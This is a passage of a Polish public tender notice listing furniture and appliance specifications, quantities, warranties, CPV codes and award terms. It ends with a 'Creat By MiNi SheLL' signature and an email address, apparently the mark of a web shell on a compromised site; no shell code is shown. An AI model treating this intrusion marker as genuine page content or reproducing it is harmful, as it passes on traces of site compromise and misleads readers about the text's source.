Dwuosobowa z funkcją spania i pojemnikiem na pościel
System rozkładania wersalkowy
Powierzchnia spania min. 197 cm x 120 cm +/- 5%
Obita materiałem zmywalnym w kolorze beżowym
Bez szczytów
Gwarancja min 24 miesiące	Szt.	1
2	Lodówka	
Pojemność chłodziarki min 170 l
Pojemność zamrażalnika min. 40 l
Zamrażalnik usytuowany na górze
Klasa energetyczna min. A+
Wymiary wysokość max. 160 cm, szerokość 55 cm +/- 5%, głębokość 59 cm +/- 5%
Gwarancja min 24 miesiące	Szt.	2
3	Krzesło obrotowe tapicerowane	Obite materiałem zmywalnym 
Obicie w kolorze czarnym
Pięcioramienna podstawa na kółkach
Regulacja wysokości siedziska w zakresie min. 43-51
Gwarancja min 12 miesięcy	Szt.	10
4	Krzesło obrotowe tapicerowane 	Siedzisko i oparcie obite materiałem zmywalnym w kolorze białym
Podstawa chromowana
Regulowana wysokość siedziska w zakresie 45-55 cm
Gwarancja min 12 miesięcy	Szt.	10
5	Zmywarka	
Wymiary 600x600x820 mm +/- 5%
Min 2 cykle pracy 
Zasilanie 230V lub 400V
Pojemność komory mycia 22-25 l
Dozownik płynu myjącego
Dozownik płynu płuczącego
Zużycie wody 2,7 l/cykl +/- 5%
Gwarancja min 24 miesiące	Szt.	1
6	Krzesło z oparciem	Obite materiałem zmywalnym w kolorze czarnym
Metalowe nogi
Wysokość siedziska  45 +/- 5%
Wymiary +/- 5% Szerokość 43 cm, Wysokość 95 cm, Głębokość 51 cm
Gwarancja min 12 miesięcy	Szt.	16
7	Taboret dla odwiedzających	Metalowe nogi
Siedzisko tapicerowane, obite materiałem zmywalnym
Średnica siedziska ok. 34 cm +/- 5%
Wysokość siedziska od podłoża ok. 47 cm +/- 5%
Gwarancja 24 miesiące
Kolor min. Jasny brąz, jasny beż (do uzgodnienia z Zamawiającym)
Gwarancja min 12 miesięcy	Szt.	10
8	Lustro logopedyczne	W drewnianej ramie
Wymiary 120 cm x 60 cm (+/- 10%)
Gwarancja min 12 miesięcy	Szt.	1
9	Lustro	
Lustro łazienkowe kryształowe
Szlifowane
Wodoodporne. 
Grubość materiału min. 4 mm. 
Wymiary: 400x600 mm (+/- 5%)
Gwarancja 24 miesiące.	Szt.	24.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.19.10.00-5, 39.11.20.00-0, 42.51.32.00-7.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 28.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com